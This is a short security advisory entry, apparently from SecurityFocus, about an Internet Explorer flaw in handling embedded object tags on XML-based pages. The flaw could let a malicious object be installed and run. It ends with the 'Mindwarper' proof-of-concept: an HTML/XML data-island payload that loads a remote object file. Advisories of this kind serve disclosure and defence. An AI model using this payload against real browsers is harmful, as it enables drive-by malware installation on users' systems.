9 lines
No EOL
880 B
Text
9 lines
No EOL
880 B
Text
source: https://www.securityfocus.com/bid/8565/info
|
|
|
|
Internet Explorer does not properly handle object types, when rendering XML based web sites. This may result in the possibility of the execution of malicious software.
|
|
|
|
The problem occurs when Internet Explorer receives a response from the server when a malicious XML web page containing an embedded object tag is parsed. Successful exploitation of this vulnerability could allow a malicious object to be trusted and as such be installed and executed on the local system.
|
|
|
|
The Mindwarper exploit is actually reported to exploit one of the issues in BID 8577, which has not been addressed by the patches provided in MS03-040.
|
|
|
|
<span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object id="oFile" data="badnews.php"></object> ]]> </exploit> </security> </xml> |